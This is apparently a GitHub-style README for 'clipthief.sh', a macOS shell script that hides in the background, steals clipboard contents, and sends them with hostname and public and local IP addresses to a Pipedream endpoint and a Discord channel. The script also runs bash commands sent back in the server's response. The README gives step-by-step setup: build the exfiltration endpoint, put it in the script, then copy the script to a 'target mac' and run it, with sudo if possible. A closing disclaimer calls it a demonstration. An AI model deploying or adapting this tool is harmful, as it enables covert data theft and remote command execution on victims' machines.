A rudimentary shell script that waits in the background and steals clipboard data, posts it to a server (and executes the bash in the response), and sends the clipboard data, along with other useful info to a discord channel.
- Create an account with Pipedream.com
- Clone this project
- Deploy the project
- Authenticate your Discord account with Pipedream and allow access to a server.
- Paste the following text in the
steps.send_message_advanced
-------------------------------------------------
Host Name --> {{event.body.localhostname}}
Local Time --> {{steps.trigger.context.ts}}
Public IP --> {{steps.trigger.event.client_ip}}
Local IP --> {{steps.trigger.event.body.localip}}
Clipboard Data --> {{event.body.clipboard}}
-------------------------------------------------
- Copy the endpoint in the trigger called
steps.trigger
(https://xxxxxxxxxxxxx.m.pipedream.net) - Replace
REPLACE_ME
in clipthief.sh with your endpoint - Copy the shell file to your target mac and execute it with
sudo ./clifthief.sh
or./clipthief.sh
if the user does not have root privileges or the root password is unknown. - Have fun (Copy something)
- You can customize what commands are executed when something is copied from the
script
field insteps.http_response
- Open an issue if something doesn't work
This script is for demonstration purposes ONLY. I (rhijjawi) am in no way responsible for your actions. Have fun :D.